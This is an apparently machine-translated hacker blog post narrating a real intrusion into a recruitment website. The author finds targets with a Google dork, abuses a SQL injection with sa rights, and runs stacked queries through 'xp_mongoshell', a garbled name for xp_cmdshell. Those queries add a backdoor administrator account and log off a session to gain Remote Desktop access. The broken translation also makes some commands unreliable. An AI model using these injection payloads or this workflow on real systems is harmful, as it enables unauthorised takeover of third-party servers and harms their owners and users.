Alimail
A boring test. I have a power outage over the past few days! It was hard to get the electricity. I quickly pulled out the source code. After a brief look, I found an injection point and went to google for practice. I will publish this article here. Google: inurl: com_job_list1.asp? Id can be injected. It is the source code of a talent network. Find an injection point. In the ah d detection, the sa permission is applied. I remember someone said that a website with no sa permissions can only indicate your technical problems.
Since it is the sa permission, I certainly can't let it go. After listing the directory, I found that I couldn't. At this time, I thought of xp_mongoshell. Because I didn't show back in ah d, I manually tested it.
Submit http://www.xxx.com/com_job_list1.asp? Id = 6228 and 1 = (select count (*) FROM master. dbo. sysobjects where xtype = x and name = xp_mongoshell)
Returns normal,
Hurry to add an account first, http://www.xxx.com/com_job_list1.asp? Id = 6228; exec master. dbo. xp_mongoshell net user shaun 111/add ;--
Add as Administrator Group
Http://www.xxx.com/com_job_list1.asp? Id = 6228; exec master. dbo. xp_mongoshell net localgroup administrators shaun/add ;--
Remote Desktop can be connected, but login prompt Remote Server exceeds the maximum number of allowed connections, mlgb, kill a, http://www.xxx.com/com_job_list1.asp? Id = 6228; exec master. dbo. xp_mongoshell logoff 1 ;--
You can log on normally this time,